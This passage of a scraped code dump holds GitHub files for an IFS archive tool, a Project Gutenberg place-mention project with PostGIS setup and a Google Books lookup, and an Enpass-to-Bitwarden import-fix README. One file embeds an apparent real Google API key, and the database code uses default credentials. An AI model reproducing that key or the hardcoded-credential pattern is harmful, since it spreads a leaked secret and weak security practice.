int(element.text)\n\n self.files = OrderedDict()\n self.folders = {}\n\n my_path = dirname(realpath(self.ifs_data.file.name))\n # muh circular deps\n from ..ifs import IFS\n\n for child in element.iterchildren(tag=etree.Element):\n filename = Node.fix_name(child.tag)\n if filename == '_info_': # metadata\n continue\n elif filename == '_super_': # sub-reference\n if self.super_disable:\n continue\n\n super_file = join(my_path, child.text)\n if not isfile(super_file):\n raise IOError('IFS references super-IFS {} but it does not exist. Use --super-disable to ignore.'.format(child.text))\n\n md5_expected = None\n if list(child) and child[0].tag == 'md5':\n md5_expected = bytearray.fromhex(child[0].text)\n\n super_ifs = IFS(super_file, super_skip_bad=self.super_skip_bad,\n super_abort_if_bad=self.super_abort_if_bad)\n super_ifs.md5_good = (super_ifs.manifest_md5 == md5_expected) # add our own sentinel\n if not super_ifs.md5_good:\n super_msg = 'IFS references super-IFS {} with MD5 {} but the actual MD5 is {}. One IFS may be corrupt.'.format(\n child.text, md5_expected.hex(), super_ifs.manifest_md5.hex()\n )\n if self.super_abort_if_bad:\n raise IOError(super_msg + ' Aborting.')\n elif self.super_skip_bad:\n tqdm.write('WARNING: {} Skipping all files it contains.'.format(super_msg))\n else:\n tqdm.write('WARNING: {}'.format(super_msg))\n\n self.supers.append(super_ifs)\n # folder: has children or timestamp only, and isn't a reference\n elif (list(child) or len(child.text.split(' ')) == 1) and child[0].tag != 'i':\n handler = self.folder_handlers.get(filename, GenericFolder)\n self.folders[filename] = handler(self.ifs_data, child, self, self.full_path, filename, self.supers,\n self.super_disable, self.super_skip_bad, self.super_abort_if_bad)\n else: # file\n if list(child) and child[0].tag == 'i':\n if self.super_disable:\n continue\n\n # backref\n super_ref = int(child[0].text)\n if super_ref > len(self.supers):\n raise IOError('IFS references super-IFS {} but we only have {}'.format(super_ref, len(self.supers)))\n\n super_ifs = self.supers[super_ref - 1]\n if not super_ifs.md5_good and self.super_skip_bad:\n continue\n\n super_files = super_ifs.tree.all_files\n try:\n super_file = next(x for x in super_files if (\n # seen in Sunny Park files: references to MD5 name instead of base\n x.name == filename or x.packed_name == Node.sanitize_name(filename)\n ))\n except StopIteration:\n raise IOError('IFS references super-IFS entry {} in {} but it does not exist'.format(filename, super_ifs.ifs_out))\n\n self.files[filename] = super_file\n else:\n self.files[filename] = self.file_handler(self.ifs_data, child, self, self.full_path, filename)\n\n if not self.full_path: # root\n self.tree_complete()\n\n def from_filesystem(self, tree):\n self.base_path = self.parent.base_path if self.parent else tree['path']\n self.time = int(getmtime(self.base_path))\n\n self.files = {}\n self.folders = {}\n\n for folder in tree['folders']:\n base = basename(folder['path'])\n handler = self.folder_handlers.get(base, GenericFolder)\n self.folders[base] = handler(self.ifs_data, folder, self, self.full_path, base)\n\n for filename in tree['files']:\n self.files[filename] = self.file_handler(self.ifs_data, None, self, self.full_path, filename)\n\n if not self.full_path: # root\n self.tree_complete()\n\n def tree_complete(self):\n for f in self.folders.values():\n f.tree_complete()\n for f in self.files.values():\n f.tree_complete()\n\n def repack(self, manifest, data_blob, tqdm_progress, **kwargs):\n if self.name:\n manifest = etree.SubElement(manifest, self.packed_name)\n manifest.attrib['__type'] = 's32'\n manifest.text = str(self.time)\n\n for name, entry in chain(self.folders.items(), self.files.items()):\n entry.repack(manifest, data_blob, tqdm_progress, **kwargs)\n\n @property\n def all_files(self):\n files = []\n for f in self.all_folders:\n files.extend(f.files.values())\n return files\n\n @property\n def all_folders(self):\n queue = [self]\n folders = []\n while queue:\n folder = queue.pop()\n folders.append(folder)\n queue.extend(folder.folders.values())\n return folders\n\n def __str__(self):\n path = self.full_path\n if not path:\n path = '<root>'\n return '{} ({} files, {} folders)'.format(path, len(self.files), len(self.folders))\n" }, { "alpha_fraction": 0.6025974154472351, "alphanum_fraction": 0.6036796569824219, "avg_line_length": 44.66666793823242, "blob_id": "9460e59d50f48c878ac5594aa837cc28135cac77", "content_id": "98b4d97e1c01ec6c344f6dde313dab493e43483e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4620, "license_type": "permissive", "max_line_length": 172, "num_lines": 99, "path": "/ifstools/ifstools.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "import argparse\r\nimport os\r\nimport multiprocessing # for pyinstaller fixes\r\nfrom sys import exit # exe freeze\r\ntry:\r\n # py 2\r\n input = raw_input\r\nexcept NameError:\r\n # py 3\r\n pass\r\n\r\nfrom .ifs import IFS\r\n\r\ndef get_choice(prompt):\r\n while True:\r\n q = input(prompt + ' [Y/n] ').lower()\r\n if not q:\r\n return True # default to yes\r\n elif q == 'y':\r\n return True\r\n elif q == 'n':\r\n return False\r\n else:\r\n print('Please answer y/n')\r\n\r\ndef extract(i, args, path):\r\n if args.progress:\r\n print('Extracting...')\r\n i.extract(path=path, **vars(args))\r\n\r\ndef repack(i, args, path):\r\n if args.progress:\r\n print('Repacking...')\r\n i.repack(path=path, **vars(args))\r\n\r\ndef main():\r\n multiprocessing.freeze_support() # pyinstaller\r\n parser = argparse.ArgumentParser(description='Unpack/pack IFS files and textures')\r\n parser.add_argument('files', metavar='file_to_unpack.ifs|folder_to_repack_ifs', type=str, nargs='+',\r\n help='files/folders to process. Files will be unpacked, folders will be repacked')\r\n parser.add_argument('-e', '--extract-folders', action='store_true', help='do not repack folders, instead unpack any IFS files inside them', dest='extract_folders')\r\n parser.add_argument('-y', action='store_true', help='don\\'t prompt for file/folder overwrite', dest='overwrite')\r\n parser.add_argument('-o', default='.', help='output directory', dest='out_dir')\r\n parser.add_argument('--tex-only', action='store_true', help='only extract textures')\r\n parser.add_argument('-c', '--canvas', action='store_true', help='dump the image canvas as defined by the texturelist.xml in _canvas.png', dest='dump_canvas')\r\n parser.add_argument('--bounds', action='store_true', help='draw image bounds on the exported canvas in red', dest='draw_bbox')\r\n parser.add_argument('--uv', action='store_true', help='crop images to uvrect (usually 1px smaller than imgrect). Forces --tex-only', dest='crop_to_uvrect')\r\n parser.add_argument('--no-cache', action='store_false', help='ignore texture cache, recompress all', dest='use_cache')\r\n parser.add_argument('--rename-dupes', action='store_true',\r\n help='if two files have the same name but differing case (A.png vs a.png) rename the second as \"a (1).png\" to allow both to be extracted on Windows')\r\n parser.add_argument('-m', '--extract-manifest', action='store_true', help='extract the IFS manifest for inspection', dest='extract_manifest')\r\n parser.add_argument('--super-disable', action='store_true',\r\n help='only extract files unique to this IFS, do not follow \"super\" parent references at all')\r\n parser.add_argument('--super-skip-bad', action='store_true',\r\n help='if a \"super\" IFS reference has a checksum mismatch, do not extract it')\r\n parser.add_argument('--super-abort-if-bad', action='store_true',\r\n help='if a \"super\" IFS reference has a checksum mismatch, cancel and display an error')\r\n parser.add_argument('-s', '--silent', action='store_false', dest='progress',\r\n help='don\\'t display files as they are processed')\r\n parser.add_argument('-r', '--norecurse', action='store_false', dest='recurse',\r\n help='if file contains another IFS, don\\'t extract its contents')\r\n\r\n args = parser.parse_args()\r\n\r\n if args.crop_to_uvrect:\r\n args.tex_only = True\r\n\r\n if args.extract_folders:\r\n dirs = [f for f in args.files if os.path.isdir(f)]\r\n # prune\r\n args.files = [f for f in args.files if not os.path.isdir(f)]\r\n # add the extras\r\n for d in dirs:\r\n args.files.extend((os.path.join(d,f) for f in os.listdir(d) if f.lower().endswith('.ifs')))\r\n\r\n for f in args.files:\r\n if args.progress:\r\n print(f)\r\n try:\r\n i = IFS(f, super_disable=args.super_disable, super_skip_bad=args.super_skip_bad,\r\n super_abort_if_bad=args.super_abort_if_bad)\r\n except IOError as e:\r\n # human friendly\r\n print('{}: {}'.format(os.path.basename(f), str(e)))\r\n exit(1)\r\n\r\n path = os.path.join(args.out_dir, i.default_out)\r\n if os.path.exists(path) and not args.overwrite:\r\n if not get_choice('{} exists. Overwrite?'.format(path)):\r\n continue\r\n\r\n if i.is_file:\r\n extract(i, args, path)\r\n else:\r\n repack(i, args, path)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n" } ]
17
Bixbeat/gutenberg-place-mentions
https://github.com/Bixbeat/gutenberg-place-mentions
cc4860a64be1b4d4d29c6b1192d3e500e3deab5d
d322c62d20dd1a21efa40a123c7aa4572f4d4afe
c28343c63c02951c3319c989d6881b8f540c83e0
refs/heads/master
2021-01-19T22:16:51.490839
2017-09-23T22:04:18
2017-09-23T22:04:18
88,785,503
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5494586825370789, "alphanum_fraction": 0.564468502998352, "avg_line_length": 38.08654022216797, "blob_id": "b77b2ffe7a415e799ee659e10c4d0a676c67d5f9", "content_id": "f58b45ac5c6133df161de206930ad95658224a58", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4064, "license_type": "permissive", "max_line_length": 175, "num_lines": 104, "path": "/lib/alter_database.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "\"\"\"\nContains all scripts that analyze the e-pub file one way or the other\n\"\"\"\n\n\ndef create_database(default_dbname, new_dbname, user, password):\n import psycopg2\n try: \n con = psycopg2.connect(\"dbname={} user={} password={}\".format(default_dbname, user, password))\n con.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n cur = con.cursor()\n except Exception as e:\n print(\"Unable to connect to the database or set the isolation level\")\n try:\n insert_query = \"\"\"CREATE DATABASE {dbname};\"\"\".format(dbname = new_dbname)\n cur.execute(insert_query)\n con.commit()\n cur.close()\n con.close()\n except:\n print(\"Failed to create database. It might already exist or you do not have the rights to make a new database.\")\n \ndef create_postgis_extension(dbname, user, password):\n import psycopg2\n con = psycopg2.connect(\"dbname={} user={} password={}\".format(dbname, user, password))\n cur = con.cursor()\n try:\n insert_query = \"\"\"CREATE EXTENSION PostGIS;\"\"\"\n cur.execute(insert_query)\n con.commit()\n except:\n print(\"Extension PostGIS already exists, or PostGIS is not installed\")\n cur.close()\n con.close()\n\ndef create_country_table(dbname, user, password, table_name, overwrite = False):\n import psycopg2\n con = psycopg2.connect(\"dbname={} user={} password={}\".format(dbname, user, password))\n cur = con.cursor()\n \n if overwrite == True:\n del_table_query = \"\"\"DROP TABLE IF EXISTS {table_name};\"\"\".format(table_name = table_name)\n cur.execute(del_table_query)\n insert_query = \"\"\"CREATE TABLE IF NOT EXISTS {table_name} (\n id \tbigint,\n time\tvarchar(50),\n latitude\tdecimal,\n longitude\tdecimal,\n selfrepcity varchar(500), \n lang\tvarchar(10),\n source\tvarchar(250),\n countrycode\tvarchar(10),\n countryname\tvarchar(250),\n location\tvarchar(250),\n url\tvarchar(100),\n text varchar(500),\n loclat decimal,\n loclong decimal);\n \"\"\".format(table_name = table_name)\n cur.execute(insert_query)\n con.commit()\n cur.close()\n con.close()\n \ndef create_gutenberg_table(dbname, user, password, table_name, overwrite = False):\n import psycopg2\n con = psycopg2.connect(\"dbname={} user={} password={}\".format(dbname, user, password))\n cur = con.cursor()\n \n if overwrite == True:\n del_table_query = \"\"\"DROP TABLE IF EXISTS {table_name};\"\"\".format(table_name = table_name)\n cur.execute(del_table_query)\n insert_query = \"\"\"CREATE TABLE IF NOT EXISTS {table_name} (\n id \tbigint,\n time\tvarchar(50),\n latitude\tdecimal,\n longitude\tdecimal,\n selfrepcity varchar(500), \n lang\tvarchar(10),\n source\tvarchar(250),\n countrycode\tvarchar(10),\n countryname\tvarchar(250),\n location\tvarchar(250),\n url\tvarchar(100),\n text varchar(500),\n loclat decimal,\n loclong decimal);\n \"\"\".format(table_name = table_name)\n cur.execute(insert_query)\n con.commit()\n cur.close()\n con.close()\n\nif __name__ == \"__main__\":\n import unittest\n\n class TestStringMethods(unittest.TestCase): \n import unittest\n \n def test_title(self):\n self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['title'], 'The Declaration of Independence of the United States of America')\n def test_creator(self):\n self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['creator'], 'Thomas Jefferson')\nunittest.main()" }, { "alpha_fraction": 0.7473683953285217, "alphanum_fraction": 0.75789475440979, "avg_line_length": 92, "blob_id": "b762a9c1c93f3bc00b30bf39bc1e082ca7d3211c", "content_id": "723d6e00b79843e252448f8cd67830365350570a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "permissive", "max_line_length": 92, "num_lines": 1, "path": "/lib/directory_functions.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "\nsubfolders = [directory[0] for directory in os.walk(\"D:\\cygwinfolders\\gutenberg-generated\")]\n\n" }, { "alpha_fraction": 0.53125, "alphanum_fraction": 0.53125, "avg_line_length": 11.800000190734863, "blob_id": "15eda08c183f5afc175c1a0ff801a8ab9bbd1ab4", "content_id": "19116e4b12414d16a87a83c66b24e18fadeb48bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64, "license_type": "permissive", "max_line_length": 26, "num_lines": 5, "path": "/lib/manage_epub_analysis_results.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "def upload(data):\n return False\n\n\nif __name__ == \"__main__\":\n" }, { "alpha_fraction": 0.6089310050010681, "alphanum_fraction": 0.618854284286499, "avg_line_length": 42.490196228027344, "blob_id": "6e7c0cedbab7ee0f6c4e72dc39ee83ccf39d45e6", "content_id": "93af4f1f060031f63069919fe6d661744f244bff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2217, "license_type": "permissive", "max_line_length": 148, "num_lines": 51, "path": "/lib/books_api_requests.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "# Source: https://www.reddit.com/r/learnpython/comments/42dqv4/python_module_to_fetch_book_info_from_google_books/\n\nimport requests\nimport re\n\nclass gbooks():\n def __init__(self):\n self.earliest_year = 9999\n self.earliest_entry = None\n self.maturity_rating = None\n self.categories = None\n \n self.googleapikey=\"AIzaSyDiUD6qk39iMWSQ3Yo8Jmmnk5F0uoKFYbw\"\n\n def search(self, title, author):\n search_value = title + author\n parms = {\"q\":search_value, 'key':self.googleapikey}\n r = requests.get(url=\"https://www.googleapis.com/books/v1/volumes\", params=parms)\n response = r.json()\n self.retrieve_earliest_publication_date(response, title)\n \n def retrieve_earliest_publication_date(self, search_results, title):\n self.earliest_date = 9999 \n \n for current_result in search_results[\"items\"]:\n print(current_result[\"volumeInfo\"])\n year = repr(current_result[\"volumeInfo\"][\"publishedDate\"])\n matched_year = re.match(r'.*([1-3][0-9]{3})', year)\n \n if 'title' in current_result[\"volumeInfo\"].keys() and matched_year is not None:\n if title in current_result[\"volumeInfo\"][\"title\"]:\n year = int(matched_year.group(1))\n\n if not isinstance(year,int): year = 9999\n if self.earliest_year > year:\n self.earliest_year = year\n self.earliest_entry = current_result\n \n self.set_entry_metadata()\n\n def set_entry_metadata(self):\n if 'maturityRating' in self.earliest_entry[\"volumeInfo\"].keys(): self.maturity_rating = self.earliest_entry[\"volumeInfo\"][\"maturityRating\"]\n if 'categories' in self.earliest_entry[\"volumeInfo\"].keys(): self.categories = self.earliest_entry[\"volumeInfo\"][\"categories\"]\n if 'pageCount' in self.earliest_entry[\"volumeInfo\"].keys(): self.pageCount = self.earliest_entry[\"volumeInfo\"][\"pageCount\"]\n \n\n\nif __name__ == \"__main__\":\n bk = gbooks()\n # bk.search(\"The Poetical Works of Addison; Gay's Fables; and Somerville's Chase / With Memoirs and Critical Dissertations, by the Rev. George Gilfillan Joseph Addison\")\n bk.search(\"The First Men in the Moon\", \"H. G. Wells\")" }, { "alpha_fraction": 0.8292682766914368, "alphanum_fraction": 0.8292682766914368, "avg_line_length": 81, "blob_id": "e02bc2d1277d48e28e8c147699066d0f3c6c11cd", "content_id": "0509c6793624338b7c8b8c8353949aae5e67e104", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 164, "license_type": "permissive", "max_line_length": 136, "num_lines": 2, "path": "/README.md", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "# gutenberg-place-mentions\nBy using Project Gutenberg e-books, this research answers the question of which cities are mentioned most often in classical literature.\n" }, { "alpha_fraction": 0.6336228847503662, "alphanum_fraction": 0.6474195122718811, "avg_line_length": 32.58620834350586, "blob_id": "13a3ffb55f2e8d246299f30f4bcea8b6295f5c50", "content_id": "990b5cf2b1ab615d5e0604feeb9b3eba049eae7b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1957, "license_type": "permissive", "max_line_length": 181, "num_lines": 58, "path": "/lib/analyze_epub.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "\"\"\"\nContains all scripts that analyze the e-pub file one way or the other\n\"\"\"\n\n## Script retrieved from the following location:\n## http://stackoverflow.com/questions/3114786/python-library-to-extract-epub-information\n\ndef get_epub_metadata(fname):\n import zipfile\n from lxml import etree\n \n ns = {\n 'n':'urn:oasis:names:tc:opendocument:xmlns:container',\n 'pkg':'http://www.idpf.org/2007/opf',\n 'dc':'http://purl.org/dc/elements/1.1/'\n }\n\n # prepare to read from the .epub file\n zip = zipfile.ZipFile(fname)\n\n # find the contents metafile\n txt = zip.read('META-INF/container.xml')\n tree = etree.fromstring(txt)\n cfname = tree.xpath('n:rootfiles/n:rootfile/@full-path',namespaces=ns)[0]\n\n # grab the metadata block from the contents metafile\n cf = zip.read(cfname)\n tree = etree.fromstring(cf)\n p = tree.xpath('/pkg:package/pkg:metadata',namespaces=ns)[0]\n \n # repackage the data\n res = {}\n for s in ['title','language','creator','date','identifier']:\n res[s] = p.xpath('dc:%s/text()'%(s),namespaces=ns)[0]\n print(res[s])\n return res\n\ndef process_text_in_ebook(path):\n import epub_conversion\n from epub_conversion.utils import open_book\n \n book_number = path.split(\"\\\\\")[-1]\n \n book = open_book(\"{}\\pg{}.epub\".format(path, book_number))\n lines = epub_conversion.converter.convert_epub_to_lines(book)\n return lines\n\nif __name__ == \"__main__\":\n import unittest\n\n class TestStringMethods(unittest.TestCase): \n import unittest\n \n def test_title(self):\n self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1013\\pg1013.epub')['title'], 'The Declaration of Independence of the United States of America')\n def test_creator(self):\n self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['creator'], 'Thomas Jefferson')\n unittest.main()\n \n " }, { "alpha_fraction": 0.672340452671051, "alphanum_fraction": 0.6851063966751099, "avg_line_length": 33.25, "blob_id": "60d27d58fabd5be93eac7f69a9a56b5a039a7bb1", "content_id": "71223caf5524330cfa8f3c6dfa3d84c7a34e8e0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1645, "license_type": "permissive", "max_line_length": 98, "num_lines": 48, "path": "/main.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "## Author: Alex Levering\n## Date: 04/19/2017\n\n\"\"\"Framework & steps:\n# 1. Parse XML, retrieve all book titles / authors / \n\n\nGet books from Gutenberg (desc)\nwget geonames (wget -r -np -k -nd http://download.geonames.org/export/dump/)\n\"\"\"\nif __name__ == \"__main__\":\n from os import chdir\n from os import walk\n import logging\n import psycopg2\n \n # Set working directory to script location\n chdir(\"D:\\git\\gutenberg\")\n \n # Script modules\n from lib import analyze_epub\n from lib import alter_database_refactored as alter_db\n \n gutenberg_db = alter_db.database_operations()\n gutenberg_db.set_database_credentials(user = \"postgres\", password = \"postgres\")\n gutenberg_db.connect_to_default_database(default_database_name = \"postgres\")\n gutenberg_db.set_project_database_name(project_database_name = \"gutenberg\")\n gutenberg_db.create_project_database()\n gutenberg_db.close_default_db_connection()\n gutenberg_db.connect_to_project_database()\n gutenberg_db.create_project_database_postgis_extension()\n \n ## Create database for location data ##\n gutenberg_db.set_location_table_name(location_table_name = \"location_lut_1000\")\n gutenberg_db.create_location_table(overwrite = False)\n gutenberg_db.insert_location_file(location_file_name = \"D:/git/gutenberg/data/cities1000.txt\")\n \n \n \n \n \n\"\"\" \n # Note-to-self: Refactor to wrapper later\n subfolders = [directory[0] for directory in walk(r'D:\\cygwinfolders\\gutenberg-generated')]\n for directory in subfolders[2:3]:\n book_text = analyze_epub.process_text_in_ebook(directory)\n print(book_text)\n\"\"\"\n\n" }, { "alpha_fraction": 0.5433210730552673, "alphanum_fraction": 0.5506890416145325, "avg_line_length": 44.24691390991211, "blob_id": "5b63aa3b202414ddff1b3f690b90aa27e4401883", "content_id": "317d0a456a0b2b2fd94d738013c48a6cbcc06740", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7329, "license_type": "permissive", "max_line_length": 175, "num_lines": 162, "path": "/lib/alter_database_refactored.py", "repo_name": "Bixbeat/gutenberg-place-mentions", "src_encoding": "UTF-8", "text": "\"\"\"\nContains all scripts that analyze the e-pub file one way or the other\n\"\"\"\nfrom importlib import import_module\n\nclass database_operations:\n def __init__(self):\n self.psycopg2 = import_module('psycopg2')\n self.logging = import_module('logging')\n \n self.user = \"\"\n self.password = \"\"\n self.default_db_con = \"\"\n self.default_db_cur = \"\"\n self.cur = \"\"\n self.con = \"\" \n \n self.location_table_name = \"\"\n self.gutenberg_table_name = \"\"\n \n def set_database_credentials(self,user, password):\n self.user = user\n self.password = password\n \n def connect_to_default_database(self, default_database_name):\n try:\n self.default_db_con = self.psycopg2.connect(\"dbname={} user={} password={}\".format(default_database_name, self.user, self.password))\n self.default_db_con.set_isolation_level(self.psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n self.default_db_cur = self.default_db_con.cursor()\n except BaseException as e:\n print(\"Failed to access default database: \" + str(e))\n \n def set_project_database_name(self, project_database_name):\n self.project_database_name = project_database_name\n \n def create_project_database(self):\n try:\n insert_query = \"\"\"CREATE DATABASE {dbname};\"\"\".format(dbname = self.project_database_name)\n self.default_db_cur.execute(insert_query)\n self.default_db_con.commit()\n except BaseException as e:\n print(\"Failed to create database: \" + str(e))\n \n def close_default_db_connection(self):\n self.default_db_cur.close()\n self.default_db_con.close()\n \n def execute_query(self, query, query_values = False):\n try:\n if query_values != False:\n self.cur.execute(query, query_values)\n self.con.commit()\n else:\n self.cur.execute(query)\n self.con.commit()\n except BaseException as e:\n print(\"Failed to perform query: \" + str(e))\n self.close_project_database_connection()\n self.connect_to_project_database()\n print(\"database connection has been reset\")\n \n def close_project_database_connection(self):\n self.cur.close()\n self.con.close() \n\n def connect_to_project_database(self):\n self.con = self.psycopg2.connect(\"dbname={} user={} password={}\".format(self.project_database_name, self.user, self.password))\n self.cur = self.con.cursor()\n \n def create_project_database_postgis_extension(self):\n try:\n insert_query = \"\"\"CREATE EXTENSION PostGIS;\"\"\"\n self.cur.execute(insert_query)\n self.con.commit()\n except BaseException as e:\n print(\"Could not create PostGIS extension: \" + str(e))\n self.close_project_database_connection()\n self.connect_to_project_database()\n print(\"database connection has been reset\")\n\n def set_location_table_name(self, location_table_name):\n self.location_table_name = location_table_name\n \n def create_location_table(self, overwrite = False): \n \"\"\"\n Create the country table by the struture listed in http://download.geonames.org/export/dump/readme.txt\n Hardcoded table structure because Geonames structure has not changed for a long time\n \"\"\"\n if overwrite == True:\n del_table_query = \"\"\"DROP TABLE IF EXISTS {table_name};\"\"\".format(table_name = self.location_table_name)\n self.cur.execute(del_table_query)\n \n country_lut_query = \"\"\"CREATE TABLE IF NOT EXISTS {table_name} (\n geonameid bigint,\n name varchar(200),\n normalizedname varchar(200),\n alternatenames varchar(10000),\n latitude decimal,\n longitude decimal, \n featureclass varchar(5),\n featurecode varchar(10),\n countrycode\t varchar(10),\n alternatecc varchar(200),\n admin1code\t varchar(80),\n admin2code\t varchar(80),\n admin3code\t varchar(20),\n admin4code\t varchar(20),\n elevation integer,\n dem integer,\n population integer,\n timezone varchar(80),\n modificationdate date,\n CONSTRAINT geoidentifier_{table_name} PRIMARY KEY(geonameid)\n );\"\"\".format(table_name = self.location_table_name)\n self.execute_query(country_lut_query)\n \n def insert_location_file(self, location_file_name):\n with open (location_file_name, encoding=\"utf-8\") as country_Data:\n for line in country_Data:\n location_row = line.split(\"\t\")\n self.insert_location_row(location_row)\n \n def insert_location_row(self, location_table_row):\n location_row_query = self.construct_query(self.location_table_name)\n location_row_query = location_row_query[:-2] + \") ON CONFLICT (geonameid) DO NOTHING;\" #Stripping last comma\n self.execute_query(location_row_query, location_table_row)\n \n def construct_query(self, target_table, row):\n row_query = \"\"\"INSERT INTO {tablename} VALUES (\"\"\".format(tablename = target_table)\n for i, entry in enumerate(row_query):\n row_query += \"%s, \"\n if entry == \"\":\n row_query[i] = \"-9999\"\n return row_query \n\n def set_gutenberg_table_name(self, gutenberg_table_name):\n self.gutenberg_table_name = gutenberg_table_name\n \n def create_book_metadata_table(self, overwrite = False):\n if overwrite == True:\n del_table_query = \"\"\"DROP TABLE IF EXISTS {table_name};\"\"\".format(table_name = self.gutenberg_table_name)\n self.cur.execute(del_table_query)\n \n gutenberg_table_query = \"\"\"CREATE TABLE IF NOT EXISTS {table_name} (\n id \tbigint,\n author\tvarchar(50),\n year\tint(4),\n title\tvarchar(200),\n \"\"\".format(table_name = self.gutenberg_table_name)\n self.execute_query(gutenberg_table_query)\n\nif __name__ == \"__main__\":\n import unittest\n\n class TestStringMethods(unittest.TestCase): \n import unittest\n \n def test_title(self):\n self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['title'], 'The Declaration of Independence of the United States of America')\n def test_creator(self):\n self.assertEqual(get_epub_metadata(r'D:\\cygwinfolders\\gutenberg-generated\\1\\pg1.epub')['creator'], 'Thomas Jefferson')\n unittest.main()" } ]
8
jvteleco/Enpass-JSON-to-Bitwarden-converter-fix
https://github.com/jvteleco/Enpass-JSON-to-Bitwarden-converter-fix
5d53cd000609aadc7602c6f524b5fd216eb0259b
a3ea4a85641c0bcde82d92c69a55e4424150cb27
c5de6ccaeeaf017fdc3b21f2f88b2afb77af63e1
refs/heads/master
2022-04-27T23:15:42.724640
2020-04-26T13:55:35
2020-04-26T13:55:35
259,005,194
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.7745767831802368, "alphanum_fraction": 0.7849717736244202, "avg_line_length": 70.63829803466797, "blob_id": "37164c6305f56703c4c9746df2e82cd01fd17c0d", "content_id": "afecc52c800459ddab5f312bd0f1647037d39518", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3375, "license_type": "no_license", "max_line_length": 221, "num_lines": 47, "path": "/README.md", "repo_name": "jvteleco/Enpass-JSON-to-Bitwarden-converter-fix", "src_encoding": "UTF-8", "text": "# Enpass-JSON-to-Bitwarden-converter-fix\nPython script to fix the custom fields not being show as hidden on Bitwarden when importing Enpass JSON\n\n\n## Summary\nWhen importing an Enpass JSON file to Bitwarden, if you have custom fields that are hidden/marked as \"Sensitive\" on Enpass, they are imported as standard text fields in Bitwarden, not as hidden (tested on Version 2.13.2)\n\n![Enpass vs Bitwarden](images/Enpass_hidden_vs_Bitwarden.jpg) \n\n\nThe python script will compare an Enpass JSON file with a Bitwarden JSON file. If it finds fields that should be hidden, it will correct the Bitwarden JSON. You can then import this new file to your vault.\n\nDISCLAIMER: ALWAYS keep a backup of the JSON files in a secure place. This files will have all your passwords in plain text, so keep them in safe place and consider encrypting them/and put them in password protected zip. \nI do not take resposability of this script messing up or loosing info of your vault. \n\n## Pre-requisites\n- Python3 (probably will work with Python2.7 or will need small adjustments)\n- JSON python library (not sure if included by default on Python3 distribution)\n\nThis is how Enpass entry looks like, with sensitive information hidden:\n\n![Enpass hidden example](images/Enpass_hidden_example.jpg?raw=true)\n\n## Instructions\n1. Export your Enpass vault as JSON. Go to File -> Export. Select JSON and save the file to your desktop. Copy the file to the working directly and rename it to Enpass_vault.json\n2. Open Bitwarden web https://vault.bitwarden.com/ (or your own self-hosted bitwaren) and login to with your username.\n3. Navigate to Tools → Import Data. Choose from the dropdown Enpass(JSON) and select your previous created file. Upload it.\n4. Check some of the items. On the photo below you can observe how the custom \"Sensitive/password\" fields at the bottom are not hidden with *** because of the incorrect import.\n\n![Bitwarden wrong import](images/Bitwarden_imported_incorrectly.jpg) \n\n5. Go again to Tools → Export Vault.Choose JSON and put your Bitwarden password.\n6. Copy the saved file (should have a format similar to \"bitwarden_export_20200426121443.json\" to the working folder and rename it as Bitwarden_exported.json\n IMPORTANT: COPY THE FILE, do not MOVE IT. Always keep the original backup Bitwarden file. \n7. Execute the python script. It will create a new Bitwarden_fixed.json file\n8. You can check the output file Fixed_DELETE.txt to see which fields have been fixed. You can also compare the Bitwarden_exported.json with the Bitwarden_fixed.json file.\n\n **IMPORTANT: DELETE the Fixed_DELETE.txt file since it will have plain text visible password!**\n\n9. Delete your Bitwarden vault. Go to Settings → At the bottom of the page, in the \"Danger zone\" box, click \"Purge vault\"\n10. Import now the corrected file name Bitwarden_fixed.json Go to Tools → Import Data. Choose from the dropdown the first element, BITWARDEN(JSON) and select the Bitwarden_fixed.json file. Upload it.\n11. Check again the items. The custom fields should now be correctly hidden when appropiate.\n\n![Bitwarden fixed](https://github.com/jvteleco/Enpass-JSON-to-Bitwarden-converter-fix/blob/master/images/Bitwarden_fields_fixed.jpg?raw=true) \n\n\n**REMEMBER to delete the Fixed_DELETE.txt file once you have finished and move all the JSON files to a secure place since they will have all your passwords.**\n" }, { "alpha_fraction": 0.643216073513031, "alphanum_fraction": 0.6984924674034119, "avg_line_length": 15.583333015441895, "blob_id": 